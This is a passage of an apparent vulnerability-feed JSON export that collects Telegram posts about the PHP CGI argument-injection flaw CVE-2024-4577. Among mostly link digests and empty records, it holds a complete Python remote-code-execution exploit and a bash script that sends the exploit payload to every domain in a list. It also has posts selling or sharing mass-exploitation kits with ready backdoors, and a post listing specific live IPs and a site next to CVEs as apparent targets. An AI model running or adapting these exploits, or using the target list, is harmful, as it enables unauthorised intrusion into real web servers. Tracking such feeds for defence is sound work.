Injection\n\nhttps://github.com/11whoami99/CVE-2024-4577/blob/88e8aa48f001d9538418783cb16179e5dfc59769/CVE-2024-4577.yaml\n\nA fuzzer for finding anomalies and analyzing how servers respond to different HTTP headers \n\nhttps://github.com/devanshbatham/headerpwn\n\nA small PoC demonstrating TLS interception on both HTTP1 and HTTP2\n\nhttps://github.com/Costinteo/hook-https\n\nPHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC \n\nhttps://github.com/watchtowrlabs/CVE-2024-4577\n\nA command line tool for extracting machine learning ready data from software binaries powered by Radare2 \n\nhttps://github.com/br0kej/bin2ml\n\nA collection of offensive Go packages inspired by different Go repositories.\n\nhttps://github.com/MrTuxx/OffensiveGolang\n\nHexVPN is a Python script that sets up a VPN connection using Riseup's VPN service. It fetches the necessary client certificates and VPN gateway configurations, measures latency to select the fastest gateway, and updates the configuration file accordingly. \n\nhttps://github.com/HexBuddy/HexVPN\n\n#HackersFactory", "creation_timestamp": "2024-06-11T23:04:36.000000Z"}, {"uuid": "dac795a4-9f89-4064-af2f-09da6a8de43b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/5116", "content": "https://airgenie.co.in/\n\nhttps://103.83.58.39/login\n\nhttps://103.83.58.45/login\n\nCVE-2023-38408\nCVE-2024-4577\nCVE-2023-51767", "creation_timestamp": "2024-12-15T07:36:26.000000Z"}, {"uuid": "1843d63c-2306-4dfe-b098-5ee6cd77ee47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/leak_db2/2048", "content": "PHP < 8.3.8 - Remote Code Execution (Unauthenticated) (Windows)\n\n# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)\n# Exploit Author: Yesith Alvarez\n# Vendor Homepage: https://www.php.net/downloads.php\n# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29\n# CVE : CVE-2024-4577\n\nfrom requests import Request, Session\nimport sys\nimport json\n\n\n\ndef title():\n    print('''\n    \n   _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______ \n  / ____\\ \\    / /  ____|  |__ \\ / _ \\__ \\| || |        | || | | ____|____  |____  |\n | |     \\ \\  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / / \n | |      \\ \\/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \\   / /    / /  \n | |____   \\  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /   \n  \\_____|   \\/   |______|  |____|\\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                              \n                                                                                                                      \n                                                                              \nAuthor: Yesith Alvarez\nGithub: https://github.com/yealvarez\nLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/\nCode improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py\n    ''')   \n\n\ndef exploit(url, command):       \n    payloads = {\n        '',\n        '' \n    }    \n    headers = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',\n    'Content-Type': 'application/x-www-form-urlencoded'}\n    s = Session()\n    for payload in payloads:\n        url = url + \"/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input\"\n        req = Request('POST', url, data=payload, headers=headers)\n        prepped = req.prepare()\n        del prepped.headers['Content-Type']\n        resp = s.send(prepped,\n        verify=False,\n        timeout=15)\n        #print(prepped.headers)\n        #print(url)\n        #print(resp.headers)       \n        #print(payload)\n        print(resp.status_code)\n        print(resp.text)\n\n\nif __name__ == '__main__':\n    title()\n    if(len(sys.argv) < 2):\n        print('[+] USAGE: python3 %s https:// \\n'%(sys.argv[0]))\n        print('[+] USAGE: python3 %s https://192.168.0.10\\n dir'%(sys.argv[0]))        \n        exit(0)\n    else:\n        exploit(sys.argv[1],sys.argv[2])", "creation_timestamp": "2024-10-29T09:05:56.000000Z"}, {"uuid": "b4f0d287-0c5a-4e11-bef1-6cb5f5bb948b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/Leak_DBMS/38", "content": "CVE-2024-4577 \nPHP CGI Argument Injection \nhttps://github.com/watchtowrlabs/CVE-2024-4577\nhttps://t.me/+R1GELDqXo1dhMmYx", "creation_timestamp": "2024-06-07T12:47:44.000000Z"}, {"uuid": "6aebec9c-b4b4-4c15-8c25-068ce94e9afd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/DEATHSHOPOFFICIAL/221", "content": "\ud83d\udcccMirTu V3 - Mass MultiCMS Exploitor \ud83d\udccc\n\nFeatures:\u2705\n   \ud83d\udcdb22+ Exploits.\ud83d\udd34\n   \ud83d\udcdb13+ Backdoors ready to deploy.\u2705\n   \ud83d\udcdbAccurate Finder to locate vulnerabilities with precision.\ud83c\udf00\n   \ud83d\udcdbBest Paths for Shell/Backdoor/Uploaders.\ud83d\udca5\n   \ud83d\udcdbPrivate Shell Exploit-Method added for exclusive access.\u2744\ufe0f\n\n\ud83d\udc8eIncluded Exploits are similar to :\ud83d\udc8e\n   \ud83d\udd25CVE-2024-31210 \ud83d\udfe1\n   \ud83d\udd25File Manager Pro Plugin \ud83d\udca5\n   \ud83d\udd25CVE-2024-4577 \ud83c\udf00\n   \ud83d\udd25WooCommerce Payments Plugin \ud83c\udfa4\n   \ud83d\udd25WP File Manager Plugin \ud83d\udd50\n   \ud83d\udd25Popup Builder Plugin \ud83d\udca5\n   \ud83d\udd25Revolution Slider Plugin \ud83d\udca0\n   \ud83d\udd25WordPress 6.3.2 Core \u23f0\n   \ud83d\udd25Newsletter Plugin \ud83c\udf4f\n   \ud83d\udd25WP E-Signature Plugin \ud83d\udc53\n   \ud83d\udd25Advanced Custom Fields Plugin \ud83e\uddb6\n   \ud83d\udd25Duplicator Plugin \ud83e\udec1\n   \ud83d\udd25Elementor Pro Plugin \ud83d\udeb6\u200d\u2642\ufe0f\n   \ud83d\udd25WP Fastest Cache Plugin \ud83c\udf9f\n   \ud83d\udd25Slider Revolution Plugin \ud83d\udc83\n   \ud83d\udd25Contact Form 7 Plugin \ud83e\udde9\n   \ud83d\udd25WP Database Reset Plugin \ud83d\ude36\u200d\ud83c\udf2b\ufe0f\n\n\u26a0\ufe0fPerformance:\u26a0\ufe0f\n   \u2604\ufe0f Very Fast Requests - optimized for speed.\ud83c\udf00\n   \u2604\ufe0f Optimized Threading for seamless operation.\ud83c\udf00\n   \u2604\ufe0f Low CPU/RAM Usage - efficient and effective.\ud83e\udd14\n\n\ud83d\udc8eIt isn't subscription based its LifeTime Edition\ud83d\udc8e\n\n    Price:\ud83d\udcb2\ud83d\udcb2\n\nFor Purchase Contact: @Alace_bot\u2705", "creation_timestamp": "2024-09-01T08:11:46.000000Z"}, {"uuid": "a6a30fae-5ec6-4a7e-b799-963c4920f3ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3321", "content": "Tools - Hackers Factory\n\nIndicators of Compromises (IOC) of our various investigations \n\nhttps://github.com/eset/malware-ioc\n\nCommunity edition nuclei templates, a simple tool that allows you to organize all the Nuclei templates offered by the community in one place \n\nhttps://github.com/xm1k3/cent\n\nBOF implementations of CVE-2024-26229 for Cobalt Strike and BruteRatel \n\nhttps://github.com/NVISOsecurity/CVE-2024-26229-BOF\n\nGoogle & Shodan Dorks for web cameras search\n\nLarge list of\u00a0 search queries to find internet-connected webcams. Can be used in Google as well as various IP search engines (Shodan, Netlas, Censys etc).\n\nhttps://github.com/ExploitXpErtz/WebCam-Google-Shodan-Dorks\n\nFirefox Decrypt is a tool to extract passwords from Mozilla (Firefox\u2122, Waterfox\u2122, Thunderbird\u00ae, SeaMonkey\u00ae) profiles \n\nhttps://github.com/unode/firefox_decrypt\n\nThis repository contains a Nuclei template to detect the PHP CGI Argument Injection vulnerability identified as CVE-2024-4577.\n\nhttps://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template\n\nA technique that can be used to bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes (such as msfvenom) by performing on-the-fly decryption of individual encrypted assembly instructions, thus rendering memory scanners useless for that specific memory page. \n\nhttps://github.com/vxCrypt0r/Voidgate\n\nBug-Bounty-Methodology\n\nhttps://github.com/tuhin1729/Bug-Bounty-Methodology\n\nThis repository contains a collection of notes, write-ups, scripts and so much more!\n\nhttps://github.com/HolyBugx/HolyTips\n\nMulti-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud. \n\nhttps://github.com/initstring/cloud_enum\n\n#HackersFactory", "creation_timestamp": "2024-06-19T17:26:27.000000Z"}, {"uuid": "47d92a86-62ed-428e-9f6a-ad3f2f8390ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3277", "content": "Tools - Hackers Factory\n\nSmbclient-ng, a fast and user friendly way to interact with SMB shares. \n\nhttps://github.com/p0dalirius/smbclient-ng\n\n5Ghoul - 5G NR Attacks & 5G OTA Fuzzing\n\nhttps://github.com/asset-group/5ghoul-5g-nr-attacks\n\nCVE-2024-4577 PHP CGI Argument Injection\n\nhttps://github.com/11whoami99/CVE-2024-4577/blob/88e8aa48f001d9538418783cb16179e5dfc59769/CVE-2024-4577.yaml\n\nA fuzzer for finding anomalies and analyzing how servers respond to different HTTP headers \n\nhttps://github.com/devanshbatham/headerpwn\n\nA small PoC demonstrating TLS interception on both HTTP1 and HTTP2\n\nhttps://github.com/Costinteo/hook-https\n\nPHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC \n\nhttps://github.com/watchtowrlabs/CVE-2024-4577\n\nA command line tool for extracting machine learning ready data from software binaries powered by Radare2 \n\nhttps://github.com/br0kej/bin2ml\n\nA collection of offensive Go packages inspired by different Go repositories.\n\nhttps://github.com/MrTuxx/OffensiveGolang\n\nHexVPN is a Python script that sets up a VPN connection using Riseup's VPN service. It fetches the necessary client certificates and VPN gateway configurations, measures latency to select the fastest gateway, and updates the configuration file accordingly. \n\nhttps://github.com/HexBuddy/HexVPN\n\n#HackersFactory", "creation_timestamp": "2024-06-11T10:47:24.000000Z"}, {"uuid": "81e827b3-01fa-4c88-95ba-55b15564338a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/nX_vLBEfLlPk28cJVnc8MXuzPx1UR9976rGTidEOZkyBm-bU", "content": "", "creation_timestamp": "2024-11-16T16:26:08.000000Z"}, {"uuid": "3d0564ab-6e0a-4135-8a24-30d615ee534f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/Dxqj5iO988KBPDdpHXQvLY-jYwrJPCdQ6i77QEIXRWPxybOD", "content": "", "creation_timestamp": "2024-11-17T08:08:16.000000Z"}, {"uuid": "56a2797f-c7f0-4336-a7ba-478786dcc4e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/3v_L1Km8kHglM99z9Gx-p2lsvnYIaRU3JVXDXxZhsRyM6xs7", "content": "", "creation_timestamp": "2024-08-31T12:42:28.000000Z"}, {"uuid": "18ff7aa7-0cc3-4188-9ba0-7c4f60bf82ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/74IzvRfHv6As3hyVMCWy5rx44qm1MKm9hZLdVsqv0WV9bgP1", "content": "", "creation_timestamp": "2024-10-18T12:26:48.000000Z"}, {"uuid": "075d30a0-19c8-4f7f-9b67-2ba132f2f506", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "Telegram/n32upgKdh0YO44KBbW-oOYuj3dFSmCH0Lbhaf22LxGTnsy-c", "content": "", "creation_timestamp": "2024-08-18T22:42:50.000000Z"}, {"uuid": "8ab00387-5aa8-4352-b67d-4323aa967cc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "Telegram/PdegKrJaPamfHxyVU1cCFcK1K_aPIiXCcJMQHkThDBnq4jxE", "content": "", "creation_timestamp": "2024-08-21T06:15:27.000000Z"}, {"uuid": "59da370a-5112-4c16-972e-a5b487812cef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "Telegram/CkPXt0QScif4u7Vd8FMIV-Un7SbqgJvQ3JNM2zvZOrzuJw", "content": "", "creation_timestamp": "2024-06-16T10:46:07.000000Z"}, {"uuid": "aa377322-4519-48b1-8d8f-6ac2709f12a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/5amVfC08n8yldGJ_ftoeg-zcfa3v0p_P11KQ-bcSw-TXkyu_", "content": "", "creation_timestamp": "2024-09-21T21:05:44.000000Z"}, {"uuid": "4e3d678f-8b07-4997-bbc9-a26ee936ee1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2132", "content": "CVE-2024-4577 PHP CGI Remote Code Execution \n*\nwriteUP\n\n\u0434\u043b\u044f \u0432\u0435\u0440\u0441\u0438\u0439:\nPHP 8.3 < 8.3.8\nPHP 8.2 < 8.2.20\nPHP 8.1 < 8.1.29\n*\nPOC\n\n#php #rce", "creation_timestamp": "2024-06-21T07:24:33.000000Z"}, {"uuid": "304d9ee9-c43d-4c64-80c5-dd8d51b48029", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2117", "content": "CVE-2024-4577 Argument Injection in PHP-CGI\n\u0414\u041e\u041f\u041e\u041b\u041d\u0415\u041d\u0418\u0415 \u043a \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u043c\u0443 \u043f\u043e\u0441\u0442\u0443\nBASH:\n#!/bin/bash\n\n# Function to check vulnerability for a domain\ncheck_vulnerability() {\n    local domain=$1\n    local response=$(curl -s -X POST \"${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input\" \\\n        -H \"User-Agent: curl/8.3.0\" \\\n        -H \"Accept: */*\" \\\n        -H \"Content-Length: 23\" \\\n        -H \"Content-Type: application/x-www-form-urlencoded\" \\\n        -H \"Connection: keep-alive\" \\\n        --data \"\" \\\n        --max-time 10)\n\n    if [[ $response == *\"PHP Version\"* ]]; then\n        echo \"$domain: Vulnerable\"\n    fi\n}\n\n# Main function to iterate over domains\nmain() {\n    local file=$1\n    while IFS= read -r domain || [ -n \"$domain\" ]; do\n        check_vulnerability \"$domain\"\n    done < \"$file\"\n}\n\n# Check if the file argument is provided\nif [ \"$#\" -ne 1 ]; then\n    echo \"Usage: $0 \"\n    exit 1\nfi\n\n# Call the main function with the domain list file\nmain \"$1\"\n\n*\n\u0421\u043e\u0445\u0440\u0430\u043d\u044f\u0439\u0442\u0435 \u0441\u043a\u0440\u0438\u043f\u0442 \u0438 \u043f\u043e \u0441\u043f\u0438\u0441\u043a\u0443 \u0434\u043e\u043c\u0435\u043d\u043e\u0432:\n./CVE-2024-4577_script.sh /path/to/domains-list\n\n#php #xamp", "creation_timestamp": "2024-06-07T18:33:10.000000Z"}, {"uuid": "1bafc2e7-78f6-4a0d-bdef-eede535ff9ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/nILMb8uVHgncX6WagRG51ksAUDG-HbUewyjCGPC7hTCwMTQ", "content": "", "creation_timestamp": "2024-07-03T07:14:04.000000Z"}, {"uuid": "164a1edd-db08-4661-9fa6-e198fabcb168", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/yJkHVu8bJQBS8DmCGrzWKRpnJWjv9fx6nL-HV6opQnbB0iY", "content": "", "creation_timestamp": "2024-07-07T15:58:08.000000Z"}, {"uuid": "fca1964c-a5a4-47e9-ba4f-9ea2cbde91f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/zhe8OZxPRs2NDibWWn-VQUs-XzBzTbrvRzuVZTaL-IH7EZk", "content": "", "creation_timestamp": "2024-07-03T12:14:04.000000Z"}, {"uuid": "bd56804b-29ab-44d2-8838-49d1d9e4f11b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1615", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-10-18T12:25:41.000000Z"}, {"uuid": "07b04fc9-1b9e-4874-9b57-537d80155495", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6718", "content": "Tools - Hackers Factory\n\nSmbclient-ng, a fast and user friendly way to interact with SMB shares. \n\nhttps://github.com/p0dalirius/smbclient-ng\n\n5Ghoul - 5G NR Attacks & 5G OTA Fuzzing\n\nhttps://github.com/asset-group/5ghoul-5g-nr-attacks\n\nCVE-2024-4577 PHP CGI Argument Injection\n\nhttps://github.com/11whoami99/CVE-2024-4577/blob/88e8aa48f001d9538418783cb16179e5dfc59769/CVE-2024-4577.yaml\n\nA fuzzer for finding anomalies and analyzing how servers respond to different HTTP headers \n\nhttps://github.com/devanshbatham/headerpwn\n\nA small PoC demonstrating TLS interception on both HTTP1 and HTTP2\n\nhttps://github.com/Costinteo/hook-https\n\nPHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC \n\nhttps://github.com/watchtowrlabs/CVE-2024-4577\n\nA command line tool for extracting machine learning ready data from software binaries powered by Radare2 \n\nhttps://github.com/br0kej/bin2ml\n\nA collection of offensive Go packages inspired by different Go repositories.\n\nhttps://github.com/MrTuxx/OffensiveGolang\n\nHexVPN is a Python script that sets up a VPN connection using Riseup's VPN service. It fetches the necessary client certificates and VPN gateway configurations, measures latency to select the fastest gateway, and updates the configuration file accordingly. \n\nhttps://github.com/HexBuddy/HexVPN\n\n#HackersFactory", "creation_timestamp": "2024-06-11T23:04:36.000000Z"}, {"uuid": "0b336a16-45ba-468c-8eae-58fd983a4e5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1554", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-08-30T06:52:02.000000Z"}, {"uuid": "1571e91e-5717-440b-9744-315c1ec9f9a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1653", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-12-18T18:01:34.000000Z"}, {"uuid": "bfcc31cb-b9ce-4429-9dbe-f84f343e6a53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1634", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-11-30T13:27:14.000000Z"}, {"uuid": "c1dfc23d-1917-4897-a087-a7026ff138e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1602", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-09-13T16:57:01.000000Z"}, {"uuid": "d0eb9c6a-a4ab-4ae9-b75f-62452602b06e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1580", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-08-31T13:09:22.000000Z"}, {"uuid": "14290b88-47c1-4b59-b6c3-985e6234cb6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1531", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via 